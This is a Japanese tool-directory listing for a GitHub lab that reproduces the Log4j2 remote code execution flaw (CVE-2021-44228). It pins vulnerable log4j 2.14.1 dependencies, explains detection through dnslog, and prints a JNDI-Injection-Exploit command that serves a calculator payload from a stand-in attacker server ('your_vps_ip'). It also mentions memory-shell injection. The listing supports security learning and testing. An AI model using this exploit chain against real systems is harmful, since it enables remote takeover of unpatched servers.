Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
Apache-Log4j2-RCE — Apache Log4j2 RCE( CVE-2021-44228)検証環境 | Kitploit
ツール/GitHubGitHub/1in9e/apache-log4j2-rce
脆弱性分析エクスプロイトウェブアプリケーション悪用ペネトレーションテスト学習と教育ラボと実践
GitHub1in9e/apache-log4j2-rce

Apache-Log4j2-RCE

Apache Log4j2 RCE( CVE-2021-44228)検証環境

リポジトリを見る
2114年前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Apache Log4j2 RCE 検証環境

2021年12月9日以降

参考

https://mp.weixin.qq.com/s/yck74F9p9QhVw_3ykzVoSg

環境構築

mavenで関連パッケージと脆弱性のあるバージョン範囲を導入

root@kitploit:~
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-api</artifactId>
            <version>2.14.1</version>
        </dependency>
        <dependency>
            <groupId>org.apache.logging.log4j</groupId>
            <artifactId>log4j-core</artifactId>
            <version>2.14.1</version>
        </dependency>

0

確認

dnslogを利用して使用有無を確認

0

ldapとjndiを組み合わせてRCEを利用

JDKのバージョンに関係あり、JDK 11.0.1、8u191、7u201、6u211以降では手動でtrustURLCodebaseをtrueに設定する必要があります

詳細な学習についてはこちらを参照 https://blog.0kami.cn/2020/03/01/java/jndi-with-ldap/

利用方法は、jndiインジェクションツールと組み合わせることができる。例: JNDI-Injection-Exploit、fastjson_rce_tool、JNDIExploit

また、ツールと組み合わせて、公開されている複数のリターン方式やメモリシェル注入方式を実現できる

root@kitploit:~
# 
java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "open -a /System/Applications/Calculator.app"  -A your_vps_ip

1

Web

TODO

3

About

https://github.com/apache/logging-log4j2/tags

ツールをダウンロード